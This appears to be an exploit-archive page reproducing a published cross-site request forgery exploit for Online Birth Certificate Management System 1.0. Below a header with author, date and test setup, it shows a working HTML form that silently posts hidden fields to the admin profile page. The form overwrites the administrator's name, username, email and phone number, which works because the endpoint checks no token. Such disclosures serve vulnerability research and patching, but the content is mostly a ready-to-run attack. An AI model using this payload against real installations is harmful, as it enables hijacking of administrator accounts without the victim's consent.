Edit Report

Our sensors found this exploit at:

Below is a copy:

Online Birth Certificate Management System 1.0 Cross Site Request Forgery
# Exploit Title: Online Birth Certificate Management System - Cross Site Request Forgery (CSRF)
# Google Dork: N/A
# Date: 2022-9-27
# Exploit Author: yousef alraddadi -
# Vendor Homepage:
# Software Link:
# Tested on: windows 11 - XAMPP
# CVE : N/A
# Version: 1.0

# no token in update profile admin

        <title> CSRF update Profile </title>
        <form action="http://localhost/OBCMS/admin/profile.php" method="post" enctype="multipart/form-data">
            <input type="hidden" name="adminname" value="csrf111">
            <input type="hidden" name="username" value="csrf">
            <input type="hidden" name="email" value="csrf">
            <input type="hidden" name="mobilenumber" value="0">
            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="submit">Save Change</button>

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.